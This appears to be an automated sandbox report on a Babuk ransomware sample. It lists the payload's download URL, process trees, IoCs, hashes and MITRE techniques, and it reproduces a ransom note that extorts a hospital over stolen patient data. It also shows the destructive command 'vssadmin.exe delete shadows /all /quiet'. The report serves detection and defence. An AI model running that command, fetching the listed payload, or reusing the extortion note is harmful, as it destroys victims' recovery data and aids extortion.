babuk | hxxps://transfer[.]sh/45dIVs/worstgeneration[.]exe

Analysis

max time kernel
229s
max time network
192s
platform
windows10_x64
resource
win10-en-20211208
submitted
23-01-2022 12:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://transfer.sh/45dIVs/worstgeneration.exe

Score

10^/10

babuk ransomware

Malware Config

Extracted

Path

C:\How To Restore Your Files.txt

Ransom Note

You are probably wondering why you are receiving a message from me. Yesterday, duncanregional.com got breached. You are probably not aware, but over the past few days we have been exfiltrating all of your data that we could get our hands on. We took over 150GB data + patient userdata from dba servers. What happened to your files? Your network was been penetrated. All of your files were encrypted using AES-256-CTR with ChaCha8 Cipher. WARNING: Don't try to decrypt your files, shadow copies were removed, recovery methods can lead to the impossibility of recovery of the certain files. We exclusively have decryption software for your situation, no decryption software is available in the public. Pay 60,000 (USD) in XMR (Monero) to this address: 4BExj4Z7n73316oWSd6k3Wj7A12PFVUSeHoobSPpaCJVdH6Z1oRBBssemrpwW5GyRt7xi3SQCeJzUa1uFoWWNySYCxoHv13 How do you buy XMR? https://bisq.network/ to buy XMR using fiat. Alternatively use a Cryptocurrency exchange to buy XMR: https://www.kraken.com/ Use this guide: https://www.getmonero.org/ After sending the specified amount to our wallet we will provide you with the decryption keys to unlock your files. If you do not respond (24 hour deadline, starting now), or we do not receive a response from you we will start the data to our potential buyers, and leak a partial, All of your clients (patients / employers) will be informed and given proof that their data has been compromised and publish everything in a public way in multiple places and outlets to get more customers interested in buying the data and also reporting the availability of this data to the appropriate news platforms. Contact: telegram: @redeyeg0d email: [email protected]

Emails

[email protected]

URLs

https://bisq.network/

https://www.getmonero.org/

Signatures

Babuk Locker
RaaS first seen in 2021 initially called Vasa Locker.
ransomware babuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

Processes:

worstgeneration.exeAddInProcess32.exe

pid	Process
1156	worstgeneration.exe
1312	AddInProcess32.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

AddInProcess32.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ConnectSubmit.tiff	AddInProcess32.exe
File renamed	C:\Users\Admin\Pictures\ConnectSubmit.tiff => C:\Users\Admin\Pictures\ConnectSubmit.tiff.babyk	AddInProcess32.exe
File opened for modification	C:\Users\Admin\Pictures\ConnectSubmit.tiff.babyk	AddInProcess32.exe
File opened for modification	C:\Users\Admin\Pictures\SearchImport.tiff	AddInProcess32.exe
File renamed	C:\Users\Admin\Pictures\RemoveConnect.crw => C:\Users\Admin\Pictures\RemoveConnect.crw.babyk	AddInProcess32.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveConnect.crw.babyk	AddInProcess32.exe
File renamed	C:\Users\Admin\Pictures\SearchImport.tiff => C:\Users\Admin\Pictures\SearchImport.tiff.babyk	AddInProcess32.exe
File opened for modification	C:\Users\Admin\Pictures\SearchImport.tiff.babyk	AddInProcess32.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

AddInProcess32.exe

description	ioc	Process
File opened (read-only)	\??\L:	AddInProcess32.exe
File opened (read-only)	\??\X:	AddInProcess32.exe
File opened (read-only)	\??\B:	AddInProcess32.exe
File opened (read-only)	\??\M:	AddInProcess32.exe
File opened (read-only)	\??\E:	AddInProcess32.exe
File opened (read-only)	\??\Y:	AddInProcess32.exe
File opened (read-only)	\??\P:	AddInProcess32.exe
File opened (read-only)	\??\A:	AddInProcess32.exe
File opened (read-only)	\??\S:	AddInProcess32.exe
File opened (read-only)	\??\F:	AddInProcess32.exe
File opened (read-only)	\??\G:	AddInProcess32.exe
File opened (read-only)	\??\Z:	AddInProcess32.exe
File opened (read-only)	\??\W:	AddInProcess32.exe
File opened (read-only)	\??\T:	AddInProcess32.exe
File opened (read-only)	\??\U:	AddInProcess32.exe
File opened (read-only)	\??\N:	AddInProcess32.exe
File opened (read-only)	\??\O:	AddInProcess32.exe
File opened (read-only)	\??\J:	AddInProcess32.exe
File opened (read-only)	\??\V:	AddInProcess32.exe
File opened (read-only)	\??\H:	AddInProcess32.exe
File opened (read-only)	\??\K:	AddInProcess32.exe
File opened (read-only)	\??\Q:	AddInProcess32.exe
File opened (read-only)	\??\R:	AddInProcess32.exe
File opened (read-only)	\??\I:	AddInProcess32.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

worstgeneration.exe

description	pid	Process	procid_target
PID 1156 set thread context of 1312	1156	worstgeneration.exe	72

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exe

pid	Process
1736	vssadmin.exe
2540	vssadmin.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = af82d12985ecd701	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 48 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\transfer.sh	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{85D8BF13-424B-4B6A-B3CF-AD43D6041A14}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3197338035"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30928317"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0256bc3bdedd701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce0000000002000000000010660000000100002000000024b8222c36e2dd982b87d14c031e0dcbf163a84232a42fbed92e2155778baeec000000000e80000000020000200000009eca58aa7ee93fd0dabd28e4e6f1c2b5dbba04c6ca3bfc0c4836560c264cdf7c20000000e33b04555b1bd3b907fe0cb1b8674c8094c797749e71ef8a40d84fc2ba289fa540000000bb3f8e48720fa57cd180f2796793ee53256d87185f57c442a6ab31ddc7591b1592ab025dc6b443003bdee1557624371bdc1f5d4f6f39523936fecc48b6009c0f	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\transfer.sh\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\transfer.sh\ = "18"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\transfer.sh\Total = "18"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\transfer.sh\Total = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3233744264"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3197338035"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce000000000200000000001066000000010000200000007c09e9955d1bb672cbeb1de7d523a92707e8d1a7b197cc4a655e9088041c920d000000000e8000000002000020000000f8d63b0b8705d67d6d24b0f1961dbbc4c758193e64875d246bad89cc17a3526320000000f8079fb10bd1c38cf8430caf750a6904f11661a7201da3c91f55e5b17aab81a54000000005aa1cbad4e3e88118e485179781b1cb6f5f7b0df386c2dbb5ca62b377491003a3ad87438f67eb3ce18e0d23251932065ee19b0ad9337fb7cee4bac1620953fe	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0c274c3bdedd701	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "345299561"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E9BA0C2F-59B0-11EC-876A-6E47AD32310A} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "18"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30928317"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30928317"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "345299618"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\DOMStorage\transfer.sh\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "345299730"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

worstgeneration.exeAddInProcess32.exe

pid	Process
1156	worstgeneration.exe
1156	worstgeneration.exe
1312	AddInProcess32.exe
1312	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

worstgeneration.exevssvc.exe

description	pid	Process
Token: SeDebugPrivilege	1156	worstgeneration.exe
Token: SeBackupPrivilege	2948	vssvc.exe
Token: SeRestorePrivilege	2948	vssvc.exe
Token: SeAuditPrivilege	2948	vssvc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid	Process
2680	iexplore.exe
2680	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid	Process
2680	iexplore.exe
2680	iexplore.exe
3700	IEXPLORE.EXE
3700	IEXPLORE.EXE
3700	IEXPLORE.EXE
3700	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

iexplore.exeworstgeneration.exeAddInProcess32.execmd.execmd.exe

description	pid	Process	procid_target
PID 2680 wrote to memory of 3700	2680	iexplore.exe	69
PID 2680 wrote to memory of 3700	2680	iexplore.exe	69
PID 2680 wrote to memory of 3700	2680	iexplore.exe	69
PID 2680 wrote to memory of 1156	2680	iexplore.exe	70
PID 2680 wrote to memory of 1156	2680	iexplore.exe	70
PID 2680 wrote to memory of 1156	2680	iexplore.exe	70
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1156 wrote to memory of 1312	1156	worstgeneration.exe	72
PID 1312 wrote to memory of 1468	1312	AddInProcess32.exe	73
PID 1312 wrote to memory of 1468	1312	AddInProcess32.exe	73
PID 1468 wrote to memory of 1736	1468	cmd.exe	75
PID 1468 wrote to memory of 1736	1468	cmd.exe	75
PID 1312 wrote to memory of 3716	1312	AddInProcess32.exe	80
PID 1312 wrote to memory of 3716	1312	AddInProcess32.exe	80
PID 3716 wrote to memory of 2540	3716	cmd.exe	82
PID 3716 wrote to memory of 2540	3716	cmd.exe	82

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://transfer.sh/45dIVs/worstgeneration.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:82945 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3700
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe
  "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
    "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
    3⤵
    - Executes dropped EXE
    - Modifies extensions of user files
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:1736
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2540

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\321B11C090EF3178E0E67AD67E9B2AD8

MD5
8fcc480b7637c35cffb3608663183dd6

SHA1
aa6519a73b6b5eb44d997614b6f6b10525ecfcd1

SHA256
8c778382b926551185c57021eb754f7cb15a0d3c6cf03e470772e3c90e248837

SHA512
ee3c1028c520407c60a97a296f5591c2195efd7689624b188d25ab7c85e186d76e630ab4d90824604aa882c50c6aac1369eee8a28532239658a5cb479e365854

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5
2df573656498a29efb53256939846988

SHA1
b93632284eecac96e7ad12be1df82680f2b94fab

SHA256
1aa65f094d6c2a25d5ad0a56274d3a3d57ef18add7d2e9d9f2ec2d7e97f9705e

SHA512
f623eed3bc6e75ac53b42ff1f1f6cc20ef139db5d3a511a3c8323a0a011ae5088d6ac7e688a3a5dbbe00a730d4942d644da770d3e976deada83f8199fc8c325f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5
1056db3a980e3851f0fdd2f7e3b3fe90

SHA1
933545daa8e2105dcf38d8e3c0c37325fa7ec722

SHA256
8691aa0470653559adea4e95e41f719398d6038ca70c50fb77dfc29bb95ea5d4

SHA512
754bbc989046bb72c871a9cf11b6e91cf2561383a6ed3089269c679120b149161558a443880fef35374d6421b17921129d6ed5104eb026a6075e40399a0574bd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\321B11C090EF3178E0E67AD67E9B2AD8

MD5
9bf8a3419b6f97d69ae2a18feb9b2858

SHA1
45a6e4e5f349dc61932a20c55250fb2fc5c64ec5

SHA256
07b2ae6dca87f05a4ae523c06bd7f96bd5c1b1572e7f9ebd8f6d96b527f1b411

SHA512
eaa54dced480f40a97a06656b588a33e48463646228452a22ad47dab291e13d17f20c4b20b8974c62aa2040fb5c92b9d0231beb927479f9e39059f2b91b3e7c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5
c1267c39c9a83c983aa8d24131f29a65

SHA1
05780e9bb1385a2ceb07c325243ec445e1091086

SHA256
8e48b1f50f8bb3df2c3f68533ece697f0e276a216ffdb141c65221106afa73b9

SHA512
faf6835222531b39709bf6ec6659408db6d11cb5bfc6607b8599c83f5ab798103f96762ac052a2c24dd9eb3ffedac2775cb103877cd5b7ef009c402a126cec92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe

MD5
4dc689389054b8aae01c162fb7fec051

SHA1
fd4356fd980f837a813515321fe5f54d5625258b

SHA256
e69149c02a0f24731559d5bec3c1bdbe916cd2829751025845fe48ea01966b82

SHA512
e924f802421f24447ace77bce1ff7f24f11ea852ae00cc624d17bec6f6e675eb258923cd7897f5307c3346b1f08d9cea978dd980344c8905b14b1b88631895c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe.oi1aw51.partial

MD5
4dc689389054b8aae01c162fb7fec051

SHA1
fd4356fd980f837a813515321fe5f54d5625258b

SHA256
e69149c02a0f24731559d5bec3c1bdbe916cd2829751025845fe48ea01966b82

SHA512
e924f802421f24447ace77bce1ff7f24f11ea852ae00cc624d17bec6f6e675eb258923cd7897f5307c3346b1f08d9cea978dd980344c8905b14b1b88631895c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe

MD5
6a673bfc3b67ae9782cb31af2f234c68

SHA1
7544e89566d91e84e3cd437b9a073e5f6b56566e

SHA256
978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

SHA512
72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

Download Submit
memory/1156-127-0x0000000004AF0000-0x0000000004B60000-memory.dmp

Filesize
448KB

Download
memory/1156-131-0x0000000004AF0000-0x0000000004B60000-memory.dmp

Filesize
448KB

Download
memory/1156-126-0x0000000004BB0000-0x0000000004BC6000-memory.dmp

Filesize
88KB

Download
memory/1156-124-0x0000000004CC0000-0x0000000004D5C000-memory.dmp

Filesize
624KB

Download
memory/1156-128-0x0000000005590000-0x000000000559A000-memory.dmp

Filesize
40KB

Download
memory/1156-123-0x0000000004C20000-0x0000000004CB2000-memory.dmp

Filesize
584KB

Download
memory/1156-122-0x0000000005080000-0x000000000557E000-memory.dmp

Filesize
5.0MB

Download
memory/1156-125-0x0000000004B80000-0x0000000004BB2000-memory.dmp

Filesize
200KB

Download
memory/1156-132-0x0000000008E10000-0x0000000008E2A000-memory.dmp

Filesize
104KB

Download
memory/1156-133-0x0000000004E60000-0x0000000004E66000-memory.dmp

Filesize
24KB

Download
memory/1156-134-0x0000000009410000-0x0000000009760000-memory.dmp

Filesize
3.3MB

Download
memory/1156-135-0x0000000004F50000-0x0000000004F72000-memory.dmp

Filesize
136KB

Download
memory/1156-121-0x00000000001F0000-0x000000000025C000-memory.dmp

Filesize
432KB

Download
memory/1312-136-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1312-138-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download